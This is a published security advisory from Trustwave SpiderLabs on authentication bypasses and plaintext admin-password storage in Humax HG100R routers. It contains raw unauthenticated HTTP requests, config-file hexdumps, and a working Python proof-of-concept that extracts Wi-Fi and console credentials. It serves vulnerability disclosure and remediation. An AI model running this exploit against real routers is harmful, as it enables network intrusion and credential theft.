Trustwave SpiderLabs Security Advisory TWSL2017-010:
Multiple Vulnerabilities in Humax Routers

Published: 06/28/2017
Version: 1.1

Vendor: Humax (humaxdigital.com)
Product: Router HG100R-*

Finding 1: Authentication Bypass in /api
Credit: Felipe Cerqueira and Thiago Musa of Trustwave 
CVE: CVE-2017-11435

The Human Wifi Router model HG100R-* is prone to an authentication bypass 
vulnerability via specially crafted requests to the management console. The bug 
is exploitable remotely when the router is configured to expose the management 
console. The router is not validating the session token while returning answers 
for some methods in url ‘/api’. An attacker can use this vulnerability to 
retrieve sensitive information such as private/public IP addresses, SSID names 
and passwords.

Example of an authenticated request:

Request:

POST /api HTTP/1.1
Host: 192.168.0.1
Content-Length: 51
Accept: */*
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://192.168.0.1/quickSetup.html
Accept-Language: en-US,en;q=0.8,pt-BR;q=0.6,pt;q=0.4,es;q=0.2
Cookie: session_time_out=10; i18next=en; login=eyJ1aWQiOiJhZG1pbiIsInB3ZCI6IjRjZDA4YTk2MWY1YyJ9; login_token=Z224UiOCH8wX91lmQzXV7rpbpbHXD5kf
Connection: close
{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}

Response:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1452
Connection: close
[..]

The cookie login is basically a json data containing uid and pwd encoded in base64:

login={"uid":"admin","pwd":"4cd08a961f5c”};

Example of the same request without providing any authentication and the response containing sensitive data such as SSID name, IP addresses and Wifi password:

Request:

POST /api HTTP/1.1
Host: 192.168.0.1
Content-Length: 51
Accept: */*
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://192.168.0.1/quickSetup.html
Accept-Language: en-US,en;q=0.8,pt-BR;q=0.6,pt;q=0.4,es;q=0.2
Connection: close
{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}

Response:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1452
Connection: close
{
   [..]
   "result" : {
      "CM_Status_NetworkAccess" : 1,
      "DHCPS_IPv4_Enable" : 1,
      "NET_LAN_IPv4_Gateway" : "192.[..]",
      "NET_WAN_IPv4_Address" : "201.[..]",
      "NET_WAN_IPv4_DNSAddress" : {
         "dns_server" : [ "201.[..]", "201.[..]" ]
      },
      [..]
      "WiFi_Info" : {
         "wlan" : [
            {
          [..]
               "interface" : 0,
               "password" : "mywifipassword",
               "ssid" : “FelipeWifi",
               "type" : 4
            }
         ]
      },
      "WiFi_Primary_WPAPreSharedKey" : “mywifipassword",
      "model_name" : "HG100R-L4",
      "vendor_name" : "NET"
   }
}

Finding 2: Authentication Bypass in /view/basic/GatewaySettings.bin and /view/basic/ConfigUpload.html
Credit: Felipe Cerqueira and Thiago Musa of Trustwave 

The URLs /view/basic/GatewaySettings.bin and /view/basic/ConfigUpload.html are 
used to provide a backup functionality to save (GET) or restore (POST) the 
router configuration. Both are ignoring the absent of the cookies login and 
login_token and are accepting requests to download and upload the full router 
configuration. Request retrieving the file GatewaySettings.bin without providing any 
authentication:

Request:

GET /view/basic/GatewaySettings.bin HTTP/1.1
Host: 192.168.0.1
Connection: close
Response:
HTTP/1.1 200 OK
Content-Type: application/x-download
Content-Length: 19672
Connection: close
Content-disposition: attachment; filename=GatewaySettings.bin
jmÒÐy/½ëràêdä6u9e9ewf0jt9y85w690je4669jye4d-056t9p48jp4ee6u9ee659jy9e-54e4j6r0j069k-056LÈAvI2U1JWAAEoBAFNXIaSywAAAAAAAAAAAAAAQAAAAAAADGV0aDBldGgxZXRoMmV0aDN3bG4wd2xuMXdsbjJ3bG4zd2xuNHdsbjV3bG42d2xuNwAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAADhAAAA4QAAAOEAAADhAAAA4QAAAOEAAADhAAAA4QAAAOEAAADhAAAA4QAAAOECgEAU1chpLLAAAAAAAAAAEAAABAKAQBTVyGkssAAAAAAAAAAQAAAEAoBAFNXIaSywAAAAA[..]
 
Example of request uploading a configuration file:

Request:

POST /view/basic/ConfigUpload.html HTTP/1.1
Host: 192.168.0.1
Content-Length: 19866
Accept: */*
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVBgu1AAqx8ajFXY5
DNT: 1
Referer: http://192.168.0.1/index.html
Accept-Language: en-US,en;q=0.8,pt-BR;q=0.6,pt;q=0.4,es;q=0.2,ja;q=0.2
Cookie: i18next=en; session_time_out=10;
Connection: close
------WebKitFormBoundaryVBgu1AAqx8ajFXY5
Content-Disposition: form-data; name="0"; filename="AAAAAAAA.bin"
Content-Type: application/macbinary
æliD¦{x    óViÚ6u9e9ewf0jt9y85w690je4669jye4d-056t9p48jp4ee6u9ee659jy9e-54e4j6r0j069k-056LÈAvI2U1JWAAEoBAFNXIaS7QAAAAAAAAAAAAAAQAAAAAAADGV0aDBldGgxZXRoMmV0aDN3bG4wd2xuMXdsbjJ3bG4zd2xuNHdsbjV3bG42d2xuNwAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAABwgAAAcIAAAHCAAADhAAAA4QAAAOEAAADhAAAA4QAAAOEAAADhAAAA4QAAAOEAAADhAAAA4QAAAOECgEAU1chpLtAAAAAAAAAAEAAABAKAQBTVyGku0AAAAAAAAAAQAAAEAoBAFNXIaS7QAAAAAAAAABAAAAQCgEAU1chpLtAAAAAAAAAAEAAABAKAQBTVyGku0AAAAAAAAAAQAAAEAoBAFNXIaQPAAAAAAAAAABAAAAQCgEAU1chpqUAAAAAAAAAAEAAABAKAQBTVyGmpQAAAAAAAAAAQAAAEAoBAFNXIaalAAAAAAAAAABAAAAQCgEAU1chpqUAAAAAAAAAAEAAABAKA[..]

Response:

None


The router is going to reboot automatically after receiving the POST and 
loading the new configuration. A special crafted configuration file can be used 
to change the console admin password or to add a new VPN configuration (that 
could be used to redirect all the user’s traffic to a specific destination).

Finding 3: Administrative Password Stored Unencrypted
Credit: Felipe Cerqueira and Thiago Musa of Trustwave  

Using the backup generation/restore functionality provided by the URLs 
/view/basic/GatewaySettings.bin and /view/basic/ConfigUpload.html an attacker 
could retrieve, change and finally restore a specially crafted configuration. 
Exploiting this vulnerability could allow an attacker to add fake DNS entries, 
tunnel all the user’s traffic to a specific location controlled by the attacker 
where man in the middle attacks could be performed and non-encrypted traffic 
could be monitored and tampered.
But, analyzing carefully the file GatewaySettings.bin we identified that the 
administrative password was stored without any encryption.

Basically, the file is composed by a header and from the byte 96, it is encoded 
in base64:

$ hexdump -C GatewaySettings.bin | more
00000000  0a e6 6c 9f 69 44 a6 7b  78 98 09 f3 05 56 69 da  |..l.iD.{x....Vi.|
00000010  36 75 39 65 39 65 77 66  30 6a 74 39 79 38 35 77  |6u9e9ewf0jt9y85w|
00000020  36 39 30 6a 65 34 36 36  39 6a 79 65 34 64 2d 30  |690je4669jye4d-0|
00000030  35 36 74 39 70 34 38 6a  70 34 65 65 36 75 39 65  |56t9p48jp4ee6u9e|
00000040  65 36 35 39 6a 79 39 65  2d 35 34 65 34 6a 36 72  |e659jy9e-54e4j6r|
00000050  30 6a 30 36 39 6b 2d 30  35 36 01 02 00 00 4c c8  |0j069k-056....L.|
00000060  41 76 49 32 55 31 4a 57  41 41 45 6f 42 41 46 4e  |AvI2U1JWAAEoBAFN|
00000070  58 49 61 53 37 51 41 41  41 41 41 41 41 41 41 41  |XIaS7QAAAAAAAAAA|
00000080  41 41 41 41 51 41 41 41  41 41 41 41 44 47 56 30  |AAAAQAAAAAAADGV0|
00000090  61 44 42 6c 64 47 67 78  5a 58 52 6f 4d 6d 56 30  |aDBldGgxZXRoMmV0|
000000a0  61 44 4e 33 62 47 34 77  64 32 78 75 4d 58 64 73  |aDN3bG4wd2xuMXds|
000000b0  62 6a 4a 33 62 47 34 7a  64 32 78 75 4e 48 64 73  |bjJ3bG4zd2xuNHds|
000000c0  62 6a 56 33 62 47 34 32  64 32 78 75 4e 77 41 41  |bjV3bG42d2xuNwAA|
000000d0  42 77 67 41 41 41 63 49  41 41 41 48 43 41 41 41  |BwgAAAcIAAAHCAAA|
[..]

After the codes 00 00 4c c8 (which are the length of the data ahead), all the data are just encoded:
Now, the bin file makes a lot of sense:
$ tail -c 19576 GatewaySettings.bin | base64 -D | hexdump -C
00000000  02 f2 36 53 52 56 00 01  28 04 01 4d 5c 86 92 ed  |..6SRV..(..M\...|
00000010  00 00 00 00 00 00 00 00  00 00 00 40 00 00 00 00  |...........@....|
00000020  00 0c 65 74 68 30 65 74  68 31 65 74 68 32 65 74  |..eth0eth1eth2et|
00000030  68 33 77 6c 6e 30 77 6c  6e 31 77 6c 6e 32 77 6c  |h3wln0wln1wln2wl|
00000040  6e 33 77 6c 6e 34 77 6c  6e 35 77 6c 6e 36 77 6c  |n3wln4wln5wln6wl|
00000050  6e 37 00 00 07 08 00 00  07 08 00 00 07 08 00 00  |n7..............|
[..]
00001410  4d 4c 6f 67 00 0a 00 05  61 64 6d 69 6e 00 08 41  |MLog....admin..A|
00001420  41 41 41 41 41 41 41 00  04 72 6f 6f 74 00 05 68  |AAAAAAA..root..h|
00001430  75 6d 61 78 00 00 00 00  00 00 00 00 00 00 00 00  |umax............|
00001440  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

We can see in this example the password ‘AAAAAAAA’ in clear text used for the user admin.

** Exploit:
URL: https://github.com/SpiderLabs/advisories-poc

The following exploit was created as a proof of concept about the vulnerabilities found in this router:

#!/usr/bin/env python
import sys
import base64
import requests
import json
"""
Exploit to retrieve the wlan setup information (including password) and console administrative password from routers.
Affected hardware/vendor: Humax HG100R
Vulnerability found by Thiago Musa and Felipe Cerqueira in May/2017.
Author: Felipe Cerqueira - FSantos [at] TrustWave.com
"""
 
def retrieve_backup_bin(base_url):
    """
    Function to retrieve the bin configuration and get the admin password
    :param base_url: Base url address
    :type base_url: str
    :return: None
    """
    url = base_url + '/' + '/view/basic/GatewaySettings.bin'
    r = requests.get(url)
    data = r.content
    b64_decoded = base64.b64decode(data[96:])
    """
    :type b64_decoded: str
    """
    idx = b64_decoded.find('MLog')
    if idx < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    idx_end_username = b64_decoded[idx + 8:].find('\x00')
    if idx_end_username < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    idx_end_username += idx + 8
    username = b64_decoded[idx + 8:idx_end_username]
    idx_begin_password = b64_decoded[idx_end_username:].find('\x00')
    if idx_begin_password < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    idx_begin_password += idx_end_username
    idx_end_password = b64_decoded[idx_begin_password + 1:].find('\x00')
    if idx_end_password < 0:
        raise ExploitFailed('Error trying to parse GatewaySettings.bin')
    idx_end_password += idx_begin_password
    password = b64_decoded[idx_begin_password + 2:idx_end_password + 2]
    print '-- ROUTER CONSOLE CREDENTIALS --'
    print 'Username: %s' % username
    print 'Password: %s' % password
 
def retrieve_router_setup_info(base_url):
    """
    Function to retrieve the wifi SSID and password
    :param base_url: Base url address
    :type base_url: str
    :return: None
    """
    print '-- ROUTER SETUP INFO --'
    r = requests.post(base_url + '/api', json={"method": "QuickSetupInfo", "id": 90, "jsonrpc": "2.0"})
    print json.dumps(r.json(), sort_keys=True, indent=2)
    print ''
 
class ExploitFailed(Exception):
    pass
 
if __name__ == '__main__':
    print '*** ROUTER HUMAX REMOTE EXPLOIT'
    print '*** by Felipe Cerqueira - skylazart[at]gmail.com / FSantos[at]trustwave.com'
    print '*** May/2017'
    print ''
    if len(sys.argv) == 1:
        print 'Usage: %s URL' % sys.argv[0]
        sys.exit(1)
    url = sys.argv[1]
    retrieve_router_setup_info(url)
    retrieve_backup_bin(url)

** Example:

$ python ./humax_router_exploit.py http://192.168.0.1/
*** ROUTER HUMAX REMOTE EXPLOIT
*** by Felipe Cerqueira - skylazart[at]gmail.com / FSantos[at]trustwave.com
*** May/2017
-- ROUTER SETUP INFO --
{
  "id": 90,
  "jsonrpc": "2.0",
  "result": {
    "CM_Status_NetworkAccess": 1,
    "DHCPS_IPv4_Enable": 1,
    "NET_LAN_IPv4_Gateway": "192.168.0.1",
    "NET_WAN_IPv4_Address": “201.[..]",
    "NET_WAN_IPv4_DNSAddress": {
      "dns_server": [
        “201.[..]",
        "201.[..]"
      ]
    },
[..]
    "WiFi_Info": {
      "wlan": [
        {
          [..]
          ],
          "interface": 0,
          "password": “my password",
          "ssid": “mywifi",
          "type": 4
        }
      ]
    },
    "WiFi_Primary_WPAPreSharedKey": "my password",
    "model_name": "HG100R-L4",
    "vendor_name": "NET"
  }
}
-- ROUTER CONSOLE CREDENTIALS --
Username: admin
Password: BBBBBBBB

Remediation Steps:
No offical fix is available.  Affected routers should not be exposed to the 
Internet.  Ensure the remote configuration management via the Internet is 
disabled until these vulnerabilities are remediated. 

Revision History:
05/08/2017 - Attempt to contact vendor
06/08/2017 - Attempt to contact vendor
06/28/2017 - Advisory version 1.0 published
07/19/2017 - Advisory version 1.1 published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.